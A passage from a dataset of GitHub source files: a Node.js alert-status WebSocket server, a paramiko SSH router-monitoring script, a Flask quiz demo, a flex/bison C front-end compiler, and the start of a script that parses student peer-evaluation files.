"07445f1d6e152306ca867c6c23fd092a52905558", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 826, "license_type": "no_license", "max_line_length": 58, "num_lines": 29, "path": "/server/test_client_writes.js", "repo_name": "apparentlymart/failinator", "src_encoding": "UTF-8", "text": "\nvar SERVER_PORT = process.env.SERVER_PORT || 80;\n\nvar WebSocket = require('ws');\nvar ws = new WebSocket('ws://localhost:' + SERVER_PORT);\n\n\nfunction clientMessage (warning, critical, paging) {\n var out = {\n warning: warning,\n critical: critical,\n paging: paging,\n };\n console.log('[server] clientMessage', out);\n return JSON.stringify(out);\n}\nfunction write (warning, critical, paging, interval) {\n setInterval(function () {\n ws.send(clientMessage(warning, critical, paging));\n }, interval * 1000);\n}\n\nws.on('open', function open() {\n ws.send(clientMessage(true, false, false));\n\n // write(true, false, false, 12); // warning\n // write(true, true, false, 14); // critical\n // write(true, true, true, 18); // paging\n // write(false, false, false, 20); // okay\n});\n\n" }, { "alpha_fraction": 0.5898370742797852, "alphanum_fraction": 0.5981035828590393, "avg_line_length": 24.376543045043945, "blob_id": "5b3aee9331fb55cf75b158c2cda4e7a626457b85", "content_id": "8f1397e20a4fbde04e61ccb91b0422cf261d29c5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 4113, "license_type": "no_license", "max_line_length": 87, "num_lines": 162, "path": "/server/server.js", "repo_name": "apparentlymart/failinator", "src_encoding": "UTF-8", "text": "\nvar SERVER_PORT = process.env.SERVER_PORT || 80;\nvar LAST_ALERT_FILE = process.env.LAST_ALERT_FILE || '.last_alert';\nvar WEBSITE = process.env.WEBSITE || '../website/index.html';\nvar LAST_ALERT = 1444444444; // test date\nvar ALERT_STATUS = null;\n\n\nvar server = require('http').createServer(),\n fs = require('fs'),\n url = require('url'),\n bodyParser = require(\"body-parser\"),\n WebSocketServer = require('ws').Server,\n wss = new WebSocketServer({ server: server }),\n express = require('express'),\n app = express(),\n port = SERVER_PORT;\n\n\n// Middleware\napp.use(bodyParser.urlencoded({ extended: false }));\n\n// Website\napp.get('/', function(req, res){\n var data = fs.readFileSync(WEBSITE);\n res.setHeader('Content-Type', 'text/html');\n res.end(data);\n});\n\n// Api\napp.get('/api/webhook', function (req, res) {\n res.setHeader('Content-Type', 'text/html');\n res.end('This endpoint only accepts POST requests.');\n});\napp.post('/api/webhook', function (req, res) {\n console.log('[server] webhook', req.body);\n var type = req.body.message_type;\n\n if (type === 'critical')\n {\n console.log('[server-webhook] critical');\n ALERT_STATUS = 'paging';\n onMessage(clientMessage(false, true, true));\n }\n else if (type === 'warning')\n {\n console.log('[server-webhook] warning');\n ALERT_STATUS = 'warning';\n onMessage(clientMessage(true, false, false));\n }\n else if (type === 'resolved')\n {\n console.log('[server-webhook] resolved');\n ALERT_STATUS = 'okay';\n onMessage(clientMessage(false, false, false));\n }\n else if (type === 'ack')\n {\n console.log('[server-webhook] ack');\n ALERT_STATUS = 'critical';\n onMessage(clientMessage(true, true, false));\n }\n});\n\n// Static\napp.use(express.static(__dirname + '/../website'));\n\n\nwss.broadcast = function broadcast(data) {\n wss.clients.forEach(function each(client) {\n client.send(data);\n });\n};\n\n\nfunction clientMessage (warning, critical, paging) {\n var out = {\n lastAlert: LAST_ALERT,\n warning: warning,\n critical: critical,\n paging: paging,\n };\n console.log('[server] clientMessage', out);\n return JSON.stringify(out);\n}\nfunction getLastAlert (cb) {\n fs.stat(LAST_ALERT_FILE, function (err, stats) {\n if (!err && stats.isFile()) {\n var data = fs.readFileSync(LAST_ALERT_FILE);\n if (data) {\n cb(parseInt(data.toString()));\n }\n }\n });\n}\nfunction setLastAlert () {\n var timestamp = Math.floor(Date.now() / 1000);\n\n fs.writeFileSync(LAST_ALERT_FILE, timestamp);\n LAST_ALERT = timestamp;\n}\n\nfunction onMessage (message) {\n var data = null;\n try {\n data = JSON.parse(message);\n } catch (e) {\n data = message;\n }\n console.log('[server] received:', data);\n\n var warning = false,\n critical = false,\n paging = false;\n\n if (data.warning) {\n warning = true;\n }\n if (data.critical) {\n critical = true;\n }\n if (data.paging) {\n paging = true;\n // save the last alert date for a restart\n setLastAlert();\n }\n\n wss.broadcast(clientMessage(warning, critical, paging));\n}\n\n\nwss.on('connection', function connection(ws) {\n var location = url.parse(ws.upgradeReq.url, true);\n // console.log('loc', location);\n // you might use location.query.access_token to authenticate or share sessions\n // or ws.upgradeReq.headers.cookie (see http://stackoverflow.com/a/16395220/151312)\n\n ws.on('message', onMessage);\n\n console.log('[server] connected.');\n\n\n // ws.send('something!');\n // setTimeout(function () {\n // wss.broadcast('new client: ' + location.path);\n // }, 1000);\n\n\n getLastAlert(function (timestamp) {\n LAST_ALERT = timestamp;\n });\n});\n\n\nserver.on('request', app);\nserver.listen(port, function () {\n console.log('[server] Listening on ' + server.address().port);\n});\n\n\nrequire('./test_client_reads');\nrequire('./test_client_writes');\nrequire('./test_webhook_write');\n\n" } ]
6
nishantpuri01/net-auto
https://github.com/nishantpuri01/net-auto
3918fea1d3f9d7baff07a6d7c45b75174bcefd5e
1d8803eb0b0c3c35ceb05e28e8c4af34f8c7a016
b92a14be16baef1651fe88d7ccb95a6756516f96
refs/heads/main
2023-01-08T00:32:07.633368
2023-01-03T21:06:20
2023-01-03T21:06:20
303,597,683
0
0
null
2020-10-13T05:30:03
2023-01-03T19:41:44
2023-01-03T21:06:20
Python
[ { "alpha_fraction": 0.5277901291847229, "alphanum_fraction": 0.5429079532623291, "avg_line_length": 24.654762268066406, "blob_id": "89536c01c6214daa4a06983dd42c3bf1fe24b44a", "content_id": "8eb659281fb99013919aa019d9073c59d4cbb911", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2249, "license_type": "no_license", "max_line_length": 73, "num_lines": 84, "path": "/ssh.py", "repo_name": "nishantpuri01/net-auto", "src_encoding": "UTF-8", "text": "import sys\r\nimport os.path\r\nimport paramiko\r\nimport time\r\nimport re\r\nimport string\r\n\r\nufile = \"user.txt\"\r\nif os.path.isfile(ufile) == True:\r\n print(\"**user's file found**\")\r\nelse:\r\n print(\"/// Error, File not found..!\")\r\n\r\ncmdfile = \"command.txt\"\r\nif os.path.isfile(cmdfile) == True:\r\n print(\"**Command file found**\")\r\nelse:\r\n print(\"/// Error, File not found..!\")\r\n\r\n\r\ndef ssh(ip):\r\n\r\n global ufile\r\n global cmdfile\r\n\r\n try:\r\n sel_ufile = open(ufile,\"r\")\r\n sel_ufile.seek(0)\r\n\r\n user = sel_ufile.readlines()[0].split(\",\")[0].rstrip(\"\\n\")\r\n sel_ufile.seek(0)\r\n pwd = sel_ufile.readlines()[0].split(\",\")[1].rstrip(\"\\n\")\r\n sel_ufile.seek(0)\r\n #print(\"selected users id is {}\" .format(username))\r\n #print(\"selected users passwrd is {}\" .format(password))\r\n\r\n session = paramiko.SSHClient()\r\n session.set_missing_host_key_policy(paramiko.AutoAddPolicy())\r\n session.connect(ip.rstrip(\"\\n\"), username=user , password=pwd)\r\n #print(conn)\r\n \r\n connection = session.invoke_shell()\r\n\r\n connection.send(\"enable \\n\")\r\n connection.send(\"terminal length 0 \\n\")\r\n time.sleep(2)\r\n\r\n sel_cmdfile = open(cmdfile , \"r\")\r\n sel_cmdfile.seek(0)\r\n\r\n for lines in sel_cmdfile.readlines():\r\n connection.send(lines + \"\\n\")\r\n time.sleep(1)\r\n\r\n\r\n sel_ufile.close()\r\n sel_cmdfile.close()\r\n\r\n\r\n router_output = connection.recv(65535)\r\n #print(router_output)\r\n if re.search(b\"% Invalid input\",router_output):\r\n print(\"syntax error detected in device {}\" .format(ip))\r\n else:\r\n print(\"DONE for device {}\" .format(ip))\r\n\r\n\r\n search_string = re.search(b\"seconds:(\\s)+([0-9]+)\",router_output)\r\n utilize = search_string.group(2).decode(\"utf-8\")\r\n \r\n \r\n \r\n #CPU_det = CPU.group(2).decode(\"utf-8\")\r\n print(utilize)\r\n\r\n with open(\"cpu.txt\" , \"a\") as cpu_file:\r\n cpu_file.write(utilize + \"\\n\")\r\n\r\n session.close()\r\n \r\n except paramiko.AuthenticationException:\r\n print(\"***Invalid username or password***\")\r\n\r\nssh(\"192.168.195.161\")\r\n\r\n\r\n\r\n\r\n\r\n" }, { "alpha_fraction": 0.7892223596572876, "alphanum_fraction": 0.7892223596572876, "avg_line_length": 121.16666412353516, "blob_id": "7374ace259eb0ab169c663ba1ce92293171aa7cd", "content_id": "e95ca2f7c0137f5290bb33f43c68b9aa803637a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1466, "license_type": "no_license", "max_line_length": 294, "num_lines": 12, "path": "/README.md", "repo_name": "nishantpuri01/net-auto", "src_encoding": "UTF-8", "text": "# net-auto\nThis is a simple example for network automation where we are initiating an ssh connection to connect to a device using an IP address.\nThe code requires a \"user.txt\" file that contains username and password for our ssh connection and a \"command.txt\" file that contains all the command that we need to execute on our device, although to make it simple , we are only using a single line command to read the cpu usage of the device.\nThe code uses some very basic modules like sys,os,time etc., however the two main modules that actually makes the task possible are \"paramiko\"(pip install paramiko) and \"re\" (pip install regex) for regular expression that makes search some specific string possible out from a long output.\n\nworking --\n\nWhen the code is executed , it verifies the presence of \"user.txt\" and \"command.txt\" files to make ssh connection and execute commands on it.\nIn our example here, we have used a single command but the code is totally eligible to handle multi line commands.\nHere , we are using command to check CPU usage of the device, after the command is executed , from the received output from device, the code searches for a specific number(cpu usage) and writes it to another file(\"cpu.txt\")\n\nFor now the code is using a single ip address to connect but instead it can be modified to read multiple ip addresses from another file or from a list and use threading to initiate multiple ssh connection to all the devices at the same time.\n" } ]
2
yashnagda04/flask-tutorial
https://github.com/yashnagda04/flask-tutorial
ab1290395eb52deb17ec58b24c524e6b27a96434
782a8fcdcefecc42cad3cb1730de311ef8dfe501
8db0b1a6d4d7dbfde3e15da39c61410874dd2dd1
refs/heads/master
2023-06-09T03:10:52.321984
2020-05-14T18:00:43
2020-05-14T18:00:43
263,987,679
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6039473414421082, "alphanum_fraction": 0.6092105507850647, "avg_line_length": 27.185184478759766, "blob_id": "7a34c825475993fbf823b79272e5a517fb433a67", "content_id": "a8801c527b42dea2df28cc4da2d6cc8e752c62f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 760, "license_type": "no_license", "max_line_length": 84, "num_lines": 27, "path": "/app.py", "repo_name": "yashnagda04/flask-tutorial", "src_encoding": "UTF-8", "text": "from flask import Flask,render_template,request\napp = Flask(__name__)\n\[email protected]('/')\ndef hello_world():\n return 'hello world!!'\n\[email protected]('/home')\ndef greetUser():\n return render_template('home.html')\n\[email protected]('/test',methods=['GET', 'POST'])\ndef calculateResult():\n if request.method == 'POST':\n height=request.form['height']\n message=''\n if height == '8848':\n message=\"Your Answer:\"+height+\"\\nYou have passed the test,Keep it up.\"\n else:\n message=\"Your Answer:\"+height+\"\\nYou have failed the test, keep trying.\"\n\n return render_template('test.html', message=message) \n else:\n return render_template('test.html', message='')\n\nif __name__ == \"__main__\":\n app.run(debug=True)" } ]
1
prateekvij/FrontEnd-C-Compiler
https://github.com/prateekvij/FrontEnd-C-Compiler
b07862be3ebe282ab26dcfab745da7b98a9f754f
9661c61b84030d46003ebed2f23551b8d65ec437
5a3dd62022952f7cef137dc403d9945e6ca6a723
refs/heads/master
2023-03-03T08:00:44.206264
2017-10-06T16:59:01
2017-10-06T16:59:01
106,025,750
4
2
null
2017-10-06T16:20:20
2022-07-05T21:06:20
2023-02-26T17:06:46
Yacc
[ { "alpha_fraction": 0.6055607795715332, "alphanum_fraction": 0.6446748375892639, "avg_line_length": 18.290908813476562, "blob_id": "c6da5a48fcd6d2f0f2f59e8e51a21bafc040fb23", "content_id": "ace026b278d763f116483372df2ad71a30a2c411", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2122, "license_type": "no_license", "max_line_length": 236, "num_lines": 110, "path": "/README.md", "repo_name": "prateekvij/FrontEnd-C-Compiler", "src_encoding": "UTF-8", "text": "# FrontEnd-C-Compiler\n\n\nThe following is an implementation of front-end C compiler using flex and bison. The program takes a C-program as input and perform syntax parsing, semantic analysis and Intermediate Code Generation. The parser is based on LALR grammar.\n\nIf the input C program is valid, program output Symbol table along with intermediate code.\n\n\nTo compile the code, run\n```bash \n$ make\n```\nTo recompile. run\n```\n$ make clean\n$ make\n```\n\nThe program need bison and flex installed. You can install them by\n```bash\n$ sudo apt-get install bison\n$ sudo apt-get install flex\n```\n\nThe list of supported tokens is given in file \"tokens\". If you want to add or remove tokens, make changes in the file \"tokens\". Then, run\n```bash\n$ python generate_tokens.py\n```\nThis will generate \"tokens.h\" which is used by the program.\n\nTo run the code, write the sample code to parse in file \"input\". Now run the command\n```bash\n$ ./c_parser < input\n```\n\n### About the code\n1. **c_parser.y**: Primary file containing the grammer for parsing and semantic analysis.\n2. **c_parser.l**: Contains regex and token_strings for converting strings to tokens.\n3. **symtable.h**: Code for symbol table generation and maintainance. \n4. **tokens.h**: Contains tokens for flex parsing\n\n### Examples\n\n```c\nint max(int a,int b){\n\tif ( a > b ){\n\t\t return a;\n\t}\n\treturn b;\n}\nint main(){\n\t\n\tint a, b;\n\ta = 2;\n\tb = 5;\n\tint c;\n\tif ( a > b) {\n\t\treturn b;\n\t\twhile( b > 0 ){\n\t\t\tc = c+1;\n\t\t\tb = b-1;\n\t\t}\n\t}\n\treturn 0;\n}\n```\n\nOutput\n```bash\nSymbol Table\n$global\t\t0\n\t>>Name: $global\n\t>>Param count: 0\n\t>>Params : \n\t>>Var : \nmax\tint\t2\n\t>>Name: max\n\t>>Param count: 2\n\t>>Params : a(int)(1) b(int)(1) \n\t>>Var : \nmain\tint\t0\n\t>>Name: main\n\t>>Param count: 0\n\t>>Params : \n\t>>Var : a(int)(2) simple b(int)(2) simple c(int)(2) simple \n\n0 func begin max\n1 t1 = a > b\n2 if (t1 == 0) goto 4\n3 return a\n4 return b\n5 func end\n6 func begin main\n7 a = 2\n8 b = 5\n9 t2 = a > b\n10 if (t2 == 0) goto 20\n11 return b\n12 t3 = b > 0\n13 if (t3 == 0) goto 20\n14 t4 = a * 3\n15 t5 = c + t4\n16 c = t5\n17 t6 = b - 1\n18 b = t6\n19 goto 12\n20 return 0\n21 func end\n\n```\n" }, { "alpha_fraction": 0.6260162591934204, "alphanum_fraction": 0.6341463327407837, "avg_line_length": 21.272727966308594, "blob_id": "dfe29a348c7120048d01df9c78e3cb7574f17525", "content_id": "6892a4c4cd13aafad4f34266d4f6baae1279be93", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 246, "license_type": "no_license", "max_line_length": 63, "num_lines": 11, "path": "/Makefile", "repo_name": "prateekvij/FrontEnd-C-Compiler", "src_encoding": "UTF-8", "text": "c_parser: lex.yy.c y.tab.c \n\tg++ lex.yy.c y.tab.c -o c_parser -g -w -fpermissive -std=c++11\n\nlex.yy.c: y.tab.c c_parser.l\n\tlex c_parser.l\n\ny.tab.c: c_parser.y\n\tyacc -d -v -Wconflicts-sr c_parser.y \n\nclean: \n\trm lex.yy.c y.tab.c y.tab.h c_parser\n\n" }, { "alpha_fraction": 0.6425942182540894, "alphanum_fraction": 0.6466257572174072, "avg_line_length": 28.112245559692383, "blob_id": "6d0a70722b42d0fc318fabfad28a916e3480c8f9", "content_id": "8fafc7d0af529554d2e88f5dec7703be8aa89f83", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5705, "license_type": "no_license", "max_line_length": 202, "num_lines": 196, "path": "/symtable.h", "repo_name": "prateekvij/FrontEnd-C-Compiler", "src_encoding": "UTF-8", "text": "class VarNameRecord {\npublic:\n\tstring name, type, var_tag;\n\tint level;\n\tvector<int>* dimlist_ptr;\n};\n\nclass FuncNameRecord {\npublic:\n\tstring name, result_type; \n\tvector<VarNameRecord> paramlist_ptr, loc_varlist_ptr;\n\tint num_params;\n\tbool returned;\n};\n\nclass SymTable {\npublic:\n\tvector<FuncNameRecord> func_name_table;\n\tint search_func(string n, bool* found);\n\tint search_param(string p, bool* found, int fnptr);\n\tint search_var(string v, int fnptr, int l, bool* found);\n\tvoid print_symTable();\n\tvoid print_funcTable(int fnptr);\n\tint add_function(string name, string result_type\n\t\t);\n\tint add_param(int fn_ptr, string param_name, string type);\n\tint add_var(int fn_ptr, string var_name, string type, int level, string var_tag, vector<int> *dimlist_ptr);\n\tint patch(string type, list<int> *var_list, int level);\n\tvoid check_param_type(int call_ptr, int param_num, string type, bool &ok);\n};\n\nstruct Node {\n// public:\n\tmap<string, string> attr;\n\tmap<string, vector<int>* > attr_list;\n\tlist<int> *namelist;\n};\n\nSymTable* symtab = new SymTable;\n\n\nint active_func_ptr = 0; // suggest global\nint current_level = 0;\nint call_name_ptr = 0;\n\nstack<int> curr_func_stack;\n\n\n/**\n * Returns fnptr of the function with name n.\n */\nint SymTable::search_func(string n, bool* found) {\n\t*found = false;\n\n\tfor (int i=0; i<(symtab->func_name_table).size(); i++) {\n\t\tif (n == symtab->func_name_table[i].name) {\n\t\t\t*found = true;\n\t\t\treturn i;\n\t\t}\n\t}\n\n\treturn -1;\n}\n\n/**\n * Returns pnptr of the parameter of function fnptr with name p.\n */\nint SymTable::search_param(string p, bool* found, int fnptr) {\n\t*found = false;\n\n\tfor (int i=0; i<(symtab->func_name_table)[fnptr].paramlist_ptr.size();i++) {\n\t\tif (p == (symtab->func_name_table)[fnptr].paramlist_ptr[i].name) {\n\t\t\t*found = true;\n\t\t\treturn i;\n\t\t}\n\t}\n\n\treturn -1;\n}\n\n/**\n * Returns vnptr of the variable of function fnptr with name v.\n */\nint SymTable::search_var(string v, int fnptr, int l, bool* found) {\n\t*found = false;\n\tint x = symtab->func_name_table[fnptr].loc_varlist_ptr.size();\n\tfor (int i=0; i<(symtab->func_name_table)[fnptr].loc_varlist_ptr.size(); i++) {\n\t\tif (v == (symtab->func_name_table)[fnptr].loc_varlist_ptr[i].name && l >= (symtab->func_name_table)[fnptr].loc_varlist_ptr[i].level) {\n\t\t\t*found = true;\n\t\t\treturn i;\n\t\t}\n\t}\n\n\treturn -1;\n}\n\n\nvoid SymTable::print_symTable(){\n\n\tcout << \"Symbol Table\" << endl;\n\tfor (int i=0; i<(symtab->func_name_table).size(); i++) {\n\t\tcout << symtab->func_name_table[i].name << \"\\t\" << symtab->func_name_table[i].result_type << \"\\t\" << symtab->func_name_table[i].num_params << endl;\n\t\tprint_funcTable(i);\n\t}\n\tcout << \"\" << endl;\n}\n\nvoid SymTable::print_funcTable(int fnptr){\n\tcout << \"\\t>>Name: \" << symtab->func_name_table[fnptr].name << \"\\n\";\n\tcout << \"\\t>>Param count: \" << symtab->func_name_table[fnptr].num_params << endl;\n\tcout << \"\\t>>Params : \";\n\tfor (int i = 0; i < (symtab->func_name_table[fnptr].paramlist_ptr).size(); ++i)\n\t{\n\t\tcout << (symtab->func_name_table[fnptr].paramlist_ptr[i]).name << \"(\"<<(symtab->func_name_table[fnptr].paramlist_ptr[i]).type <<\")(\" << (symtab->func_name_table[fnptr].paramlist_ptr[i]).level <<\") \";\n\t}\n\tcout << endl <<\"\\t>>Var : \";\n\tauto loc_ptr = symtab->func_name_table[fnptr].loc_varlist_ptr;\n\tfor (int i = 0; i < loc_ptr.size(); ++i)\n\t{\n\t\tcout << (loc_ptr[i]).name << \"(\"<<(loc_ptr[i]).type <<\")(\" << (loc_ptr[i]).level<<\")\" << \" \" << loc_ptr[i].var_tag << \" \" ;\n\t\tfor(auto it = loc_ptr[i].dimlist_ptr->begin(); it != loc_ptr[i].dimlist_ptr->end(); it++) {\n\t\t\tcout << *it << \" \";\n\t\t}\n\n\t}\n\tcout << endl;\n}\nint SymTable::add_function(string name, string result_type) {\n\tint fn_ptr = symtab->func_name_table.size();\n\t// cout << fn_ptr << endl;\n\tFuncNameRecord fn_record;\n\tfn_record.name = name;\n\tfn_record.result_type = result_type;\n\tfn_record.num_params = 0;\n\tfn_record.returned = false;\n\tsymtab->func_name_table.push_back(fn_record);\n\tsymtab->func_name_table[fn_ptr].loc_varlist_ptr = symtab->func_name_table[0].loc_varlist_ptr;\n\treturn fn_ptr;\n}\n\nint SymTable::add_param(int fn_ptr, string param_name, string type) {\n\tVarNameRecord param;\n\tparam.name = param_name;\n\tparam.type = type;\n\t// param.var_tag = var_tag;\n\tparam.level =1;\n\tsymtab->func_name_table[fn_ptr].paramlist_ptr.push_back(param);\n\tsymtab->func_name_table[fn_ptr].num_params += 1;\n\treturn symtab->func_name_table[fn_ptr].paramlist_ptr.size() - 1;\n}\n\nint SymTable::add_var(int fn_ptr, string var_name, string type, int level, string var_tag, vector<int> *dimlist_ptr) {\n\tVarNameRecord var;\n\tvar.name = var_name;\n\tvar.type = type;\n\tvar.level =level;\n\tvar.var_tag = var_tag;\n\tvar.dimlist_ptr = dimlist_ptr;\n\tsymtab->func_name_table[fn_ptr].loc_varlist_ptr.push_back(var);\n\treturn symtab->func_name_table[fn_ptr].loc_varlist_ptr.size() - 1;\n}\n\n\n// Patch datatype to the parameter of \"active\" function\n// Returns 1 if success, 0 if fails\nint SymTable::patch(string type, list<int> *var_list, int level) {\n\tlist<int>::const_iterator iter;\n\tint func_var_count = symtab->func_name_table[active_func_ptr].loc_varlist_ptr.size();\n\tfor (iter = var_list->begin(); iter != var_list->end(); ++iter) {\n\t if (*iter >= func_var_count)\n\t {\n\t \treturn 0;\n\t }\n\t if (level == symtab->func_name_table[active_func_ptr].loc_varlist_ptr[*iter].level)\n\t {\n\t \tsymtab->func_name_table[active_func_ptr].loc_varlist_ptr[*iter].type = type;\t\n\t }\n\t \n\t}\n\treturn 1;\n}\n\nvoid SymTable::check_param_type(int call_ptr, int param_num, string type, bool &ok) {\n\tif (call_ptr < this->func_name_table.size() && param_num < this->func_name_table[call_ptr].num_params)\n\t{\t\n\t\tif(this->func_name_table[call_ptr].paramlist_ptr[param_num - 1].type == type) \n\t\t\tok = true;\n\t\telse \n\t\t\tok = false;\t\t\n\t}\n\telse{\n\t\tok = false;\t\n\t}\n\t\n\t\t\n}" }, { "alpha_fraction": 0.5723025798797607, "alphanum_fraction": 0.5723025798797607, "avg_line_length": 34.25490188598633, "blob_id": "ab3b96c831511ab0a6135ef998d1cc0e2d10c296", "content_id": "6d801f990e93afc6d1dfbd9f16879b1894053218", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1798, "license_type": "no_license", "max_line_length": 70, "num_lines": 51, "path": "/tokens.h", "repo_name": "prateekvij/FrontEnd-C-Compiler", "src_encoding": "UTF-8", "text": "\"if\" \t\t\t\t\tRET(\"IF\", IF)\n\"else\" \t\t\t\t\tRET(\"ELSE\", ELSE)\n\"while\"\t\t\t\t\tRET(\"WHILE\", WHILE)\n\"do\" \t\t\t\t\tRET(\"DO\", DO)\n\"for\" \t\t\t\t\tRET(\"FOR\", FOR)\n\"main\" \t\t\t\t\tRET(\"MAIN\", MAIN)\n\"struct\"\t\t\t\tRET(\"STRUCT\", STRUCT)\n\"return\" \t\t\t\tRET(\"RETURN\", RETURN)\n\"default\" \t\t\t\tRET(\"DEFAULT\", DEFAULT)\n\"const\" \t\t\t\tRET(\"CONST\", CONST)\n\"break\" \t\t\t\tRET(\"BREAK\", BREAK)\n\"continue\" \t\t\t\tRET(\"CONTINUE\", CONTINUE)\n\"goto\" \t\t\t\t\tRET(\"GOTO\", GOTO)\n\"void\" \t\t\t\t\tRET(\"VOID\", VOID)\n\"int\" \t\t\t\t\tRET(\"INT\", INT)\n\"float\" \t\t\t\tRET(\"FLOAT\", FLOAT)\n\"char\" \t\t\t\t\tRET(\"CHAR\", CHAR)\n\"semicolon\" \t\t\tRET(\"SEMICOLON\", SEMICOLON)\n\"comma\" \t\t\t\tRET(\"COMMA\", COMMA)\n\"left_sq_bracket\" \t\tRET(\"LEFT_SQ_BRACKET\", LEFT_SQ_BRACKET)\n\"right_sq_bracket\" \t\tRET(\"RIGHT_SQ_BRACKET\", RIGHT_SQ_BRACKET)\n\"left_curly_bracket\" \tRET(\"LEFT_CURLY_BRACKET\", LEFT_CURLY_BRACKET)\n\"right_curly_bracket\" \tRET(\"RIGHT_CURLY_BRACKET\", RIGHT_CURLY_BRACKET)\n\"lp\" \t\t\t\t\tRET(\"LP\", LP)\n\"rp\" \t\t\t\t\tRET(\"RP\", RP)\n\"plus\" \t\t\t\t\tRET(\"PLUS\", PLUS)\n\"minus\" \t\t\t\tRET(\"MINUS\", MINUS)\n\"asterisk\" \t\t\t\tRET(\"ASTERISK\", ASTERISK)\n\"divide\" \t\t\t\tRET(\"DIVIDE\", DIVIDE)\n\"dot\" \t\t\t\t\tRET(\"DOT\", DOT)\n\"dereference\" \t\t\tRET(\"DEREFERENCE\", DEREFERENCE)\n\"amp\" \t\t\t\t\tRET(\"AMP\", AMP)\n\"modulo\" \t\t\t\tRET(\"MODULO\", MODULO)\n\"assign_op\" \t\t\tRET(\"ASSIGN_OP\", ASSIGN_OP)\n\"and_exp\" \t\t\t\tRET(\"AND_EXP\", AND_EXP)\n\"or_exp\" \t\t\t\tRET(\"OR_EXP\", OR_EXP)\n\"not_exp\" \t\t\t\tRET(\"NOT_EXP\", NOT_EXP)\n\"right_shift\" \t\t\tRET(\"RIGHT_SHIFT\", RIGHT_SHIFT)\n\"left_shift\" \t\t\tRET(\"LEFT_SHIFT\", LEFT_SHIFT)\n\"and_bit\" \t\t\t\tRET(\"AND_BIT\", AND_BIT)\n\"or_bit\" \t\t\t\tRET(\"OR_BIT\", OR_BIT)\n\"lt\" \t\t\t\t\tRET(\"LT\", LT)\n\"gt\" \t\t\t\t\tRET(\"GT\", GT)\n\"eq\" \t\t\t\t\tRET(\"EQ\", EQ)\n\"lte\" \t\t\t\t\tRET(\"LTE\", LTE)\n\"gte\" \t\t\t\t\tRET(\"GTE\", GTE)\n\"integer\" \t\t\t\tRET(\"INTEGER\", INTEGER)\n\"char\" \t\t\t\t\tRET(\"CHAR\", CHAR)\n\"string\" \t\t\t\t\tRET(\"STRING\", STRING)\n\"float\" \t\t\t\t\tRET(\"FLOAT\", FLOAT)\n\"id\" \t\t\t\t\tRET(\"ID\", ID)\n" }, { "alpha_fraction": 0.5582524538040161, "alphanum_fraction": 0.5679611563682556, "avg_line_length": 28.428571701049805, "blob_id": "51c02db6cfad3ecad90ec1877ca00b00a45c9fd5", "content_id": "4440ba3f2b57f5903885b55d90cf220cd7831c22", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 206, "license_type": "no_license", "max_line_length": 85, "num_lines": 7, "path": "/generate_tokens.py", "repo_name": "prateekvij/FrontEnd-C-Compiler", "src_encoding": "UTF-8", "text": "out = open('tokens.h','w')\ntokens = open('tokens').readlines()\ni= 0\nfor token in tokens:\n\ti += 1\n\ttoken = token.strip()\n\tout.write(\"\\\"\"+token+\"\\\" \\t\\t\\t\\t\\tRET(\\\"\"+token.upper()+\"\\\", \"+token.upper()+\")\\n\")\n" } ]
5
ayshih2/cs498midparser
https://github.com/ayshih2/cs498midparser
c803de5c3ecf4e0775c6427f9d27bb39370d978d
ef197282445f0ed2007f231d6152940b059b94fe
3c3d40dfd128a38031be99e27262ac09823a1818
refs/heads/master
2020-04-23T00:52:48.688280
2019-02-19T04:36:30
2019-02-19T04:36:30
170,795,153
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5829260349273682, "alphanum_fraction": 0.5928640961647034, "avg_line_length": 41.625, "blob_id": "b02a3cf10cd646b9ac4a904170fd15320fca1959", "content_id": "a9900f76a21b32ca7e4bd1a72fabe72d86d1612f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6138, "license_type": "no_license", "max_line_length": 129, "num_lines": 144, "path": "/Parser.py", "repo_name": "ayshih2/cs498midparser", "src_encoding": "UTF-8", "text": "import csv\nimport os\nimport collections\nimport math\n\n# directory is the path to a folder of peer evaluation txt files\ndirectory = '/Users/annabelleshih/Desktop/CS498PeerEvaluations/peerevaluationstxtfiles'\n# key - netid, value - object w/ team #, num teammates, own score, averaged score from others\nstudents = {}\n# number of actual people per team - 8 teams total for SP19 CS 498 MID class\nteams = {\"1\": 0, \"2\": 0, \"3\": 0, \"4\": 0, \"5\": 0, \"6\": 0, \"7\": 0, \"8\": 0}\n\n\nclass grades:\n def __init__(self, team, own, other, num_teammates, teammates):\n self.team = team\n self.own = own\n self.other = other\n self.num_teammates = num_teammates\n self.teammates = teammates\n\n\n# populate students dict with netid as key and new grades object (default: team #, 0, 0, {})\nwith open(\"/Users/annabelleshih/Desktop/CS498PeerEvaluations/CS498_team_assignments.csv\") as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n for row in csv_reader:\n if row:\n email = row[2]\n if email != \"Email\" and email != \"\":\n students[email[:email.find(\"@\")]] = grades(row[3], 0, 0, 0, {})\n # keep track of num students in a team\n teams[row[3]] += 1\n\n\n# since students enter score as [number]%, must strip % symbol\ndef get_score(score_str):\n return int(score_str[:score_str.find(\"%\")])\n\n\nfor filename in os.listdir(directory):\n if filename.endswith(\".txt\"):\n # read contents of each file\n with open(directory + \"/\" + filename, encoding=\"utf-8-sig\") as f:\n foundOwner = False\n findScore = False\n curr_student = \"\"\n owner = \"\"\n\n for line in f:\n # for some reason, downloading files from Compass gives me 2 versions. only want peer evaluation\n if \"Name:\" not in line:\n # must parse file\n curr_line = line.strip().lower()\n\n # if on prev iteration, have found a netid, now have to find associated score\n if findScore and curr_student == owner:\n students[curr_student].own = get_score(curr_line)\n findScore = False\n elif findScore and curr_student != owner:\n students[curr_student].num_teammates += 1\n students[curr_student].other += 